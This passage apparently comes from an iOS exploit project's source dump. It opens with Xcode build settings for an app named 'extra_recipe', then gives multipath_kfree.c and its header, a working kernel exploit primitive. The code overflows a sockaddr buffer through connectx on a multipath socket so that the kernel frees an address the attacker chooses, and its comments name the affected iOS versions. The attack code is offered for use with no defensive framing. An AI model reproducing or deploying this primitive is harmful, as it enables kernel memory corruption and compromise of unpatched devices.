854G7LGZ42;\n\t\t\t\tINFOPLIST_FILE = extra_recipe/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t\t\"-pagezero_size\",\n\t\t\t\t\t0x16000,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.example.extra-recipe\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tSWIFT_OBJC_BRIDGING_HEADER = \"extra_recipe/extra_recipe-Bridging-Header.h\";\n\t\t\t\tSWIFT_OPTIMIZATION_LEVEL = \"-Onone\";\n\t\t\t\tSWIFT_VERSION = 3.0;\n\t\t\t};\n\t\t\tname = Debug;\n\t\t};\n\t\tB0F37BD11E361EAE00179E85 /* Release */ = {\n\t\t\tisa = XCBuildConfiguration;\n\t\t\tbuildSettings = {\n\t\t\t\tASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;\n\t\t\t\tCLANG_ENABLE_MODULES = YES;\n\t\t\t\tCODE_SIGN_ENTITLEMENTS = extra_recipe/extra_recipe.entitlements;\n\t\t\t\tDEVELOPMENT_TEAM = 854G7LGZ42;\n\t\t\t\tINFOPLIST_FILE = extra_recipe/Info.plist;\n\t\t\t\tLD_RUNPATH_SEARCH_PATHS = \"$(inherited) @executable_path/Frameworks\";\n\t\t\t\tOTHER_LDFLAGS = (\n\t\t\t\t\t\"-framework\",\n\t\t\t\t\tIOKit,\n\t\t\t\t\t\"-pagezero_size\",\n\t\t\t\t\t0x16000,\n\t\t\t\t);\n\t\t\t\tPRODUCT_BUNDLE_IDENTIFIER = \"com.example.extra-recipe\";\n\t\t\t\tPRODUCT_NAME = \"$(TARGET_NAME)\";\n\t\t\t\tSWIFT_OBJC_BRIDGING_HEADER = \"extra_recipe/extra_recipe-Bridging-Header.h\";\n\t\t\t\tSWIFT_VERSION = 3.0;\n\t\t\t};\n\t\t\tname = Release;\n\t\t};\n/* End XCBuildConfiguration section */\n\n/* Begin XCConfigurationList section */\n\t\tB0F37BB81E361EAD00179E85 /* Build configuration list for PBXProject \"extra_recipe_extra_extra_bug\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\tB0F37BCD1E361EAE00179E85 /* Debug */,\n\t\t\t\tB0F37BCE1E361EAE00179E85 /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n\t\tB0F37BCF1E361EAE00179E85 /* Build configuration list for PBXNativeTarget \"extra_recipe\" */ = {\n\t\t\tisa = XCConfigurationList;\n\t\t\tbuildConfigurations = (\n\t\t\t\tB0F37BD01E361EAE00179E85 /* Debug */,\n\t\t\t\tB0F37BD11E361EAE00179E85 /* Release */,\n\t\t\t);\n\t\t\tdefaultConfigurationIsVisible = 0;\n\t\t\tdefaultConfigurationName = Release;\n\t\t};\n/* End XCConfigurationList section */\n\t};\n\trootObject = B0F37BB51E361EAD00179E85 /* Project object */;\n}\n" }, { "path": "extra_recipe_extra_extra_bug.xcodeproj/project.xcworkspace/contents.xcworkspacedata", "content": "\n\n \n \n\n" }, { "path": "extra_recipe_extra_extra_bug.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist", "content": "\n\n\n\n\tIDEDidComputeMac32BitWarning\n\t\n\n\n" }, { "path": "extra_recipe_extra_extra_bug.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme", "content": "\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n" }, { "path": "extra_recipe_extra_extra_bug.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist", "content": "\n\n\n\n\tSchemeUserState\n\t\n\t\textra_recipe.xcscheme\n\t\t\n\t\t\torderHint\n\t\t\t0\n\t\t\n\t\n\tSuppressBuildableAutocreation\n\t\n\t\tB0F37BBC1E361EAD00179E85\n\t\t\n\t\t\tprimary\n\t\t\t\n\t\t\n\t\n\n\n" }, { "path": "multipath_kfree/multipath_kfree.c", "content": "// Created by John Åkerblom 2018-06-01\n\n#include \"multipath_kfree.h\"\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#define MULTIPATH_ERRNO_CHECK // Enable rudimentary error checking. Not thread-safe.\n#ifdef MULTIPATH_ERRNO_CHECK\n#include \n#endif\n\n#pragma pack(push, 1)\nstruct not_todescos_not_essers_ipc_object\n{\n uint8_t zeroes[132-88]; // Unused by us\n uint32_t mpte_itfinfo_size; // If > 4, ->mpte_itfinfo free'd\n uint8_t nonzeroes[168-136]; // Unused by us\n uint8_t nonzeroes2[16]; // Unused by us\n uint64_t mpte_itfinfo; // Address to free\n};\n#pragma pack(pop)\n\nstatic void _multipath_connectx_overflow(int sock, void *buf, size_t n)\n{\n struct sockaddr_in *sa_dst = calloc(1, 0x4000);\n memset(sa_dst, 0x0, 0x4000);\n memcpy(sa_dst, buf, n);\n sa_dst->sin_family = AF_UNSPEC;\n sa_dst->sin_len = n;\n \n struct sockaddr_in sa_src;\n memset(&sa_src, 0, sizeof(sa_src));\n sa_src.sin_family = AF_INET;\n sa_src.sin_len = 255;\n \n sa_endpoints_t sae;\n sae.sae_srcif = 0;\n sae.sae_srcaddr = (struct sockaddr *)&sa_src;\n sae.sae_srcaddrlen = 255;\n sae.sae_dstaddr = (struct sockaddr *)sa_dst;\n sae.sae_dstaddrlen = (socklen_t)n;\n \n#ifdef MULTIPATH_ERRNO_CHECK\n errno = 0;\n#endif\n \n // Trigger overflow\n connectx(sock, &sae, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);\n \n // We expect return value -1, errno 22 on success (but they don't guarantee it)\n \n#ifdef MULTIPATH_ERRNO_CHECK\n if (errno == 1)\n {\n // Protip: Apple actually charges more than $100 for some regions (RIP 1000 SEK)\n *(int *)(\"You\") = (int)\"need to pay Apple $100 (add the multipath entitlement)\";\n }\n else if (errno == 47)\n {\n *(int *)(\"You\") = (int)\"need to find another bug (iOS < 11.3.1 only)\";\n }\n#endif\n \n free(sa_dst);\n}\n\nstatic void _multipath_kfree(int sock, uint64_t addr, size_t addr_size)\n{\n struct not_todescos_not_essers_ipc_object s;\n memset(&s, 0x00, sizeof(s));\n memset(&s.nonzeroes, 0x42, sizeof(s.nonzeroes));\n //memset(&_s1.nonzeroes2, 0x42, sizeof (_s.nonzeroes2)); // Irrelevant\n s.mpte_itfinfo_size = 8; // > 4\n s.mpte_itfinfo = addr; // Address to free\n \n _multipath_connectx_overflow(sock, &s, sizeof(s) - sizeof(s.mpte_itfinfo) + addr_size);\n \n // Close for cleanup by GC\n close(sock);\n}\n\n/* multipath_kfree: cause GC to free a kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree(int mp_sock, uint64_t addr)\n{\n _multipath_kfree(mp_sock, addr, sizeof(addr));\n}\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part)\n{\n _multipath_kfree(mp_sock, addr_lowest_part, sizeof(addr_lowest_part));\n}\n" }, { "path": "multipath_kfree/multipath_kfree.h", "content": "// Created by John Åkerblom 2018-06-01\n\n#include \n\n#ifndef multipath_kfree_h\n#define multipath_kfree_h\n\n/* multipath_kfree: cause GC to free a kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree(int mp_sock, uint64_t addr);\n\n/* multipath_kfree_nearby_self: cause GC to free a \"nearby\" kernel address.\n NOTE: closes mp_sock */\nvoid multipath_kfree_nearby_self(int mp_sock, uint16_t addr_lowest_part);\n\n#endif\n" } ]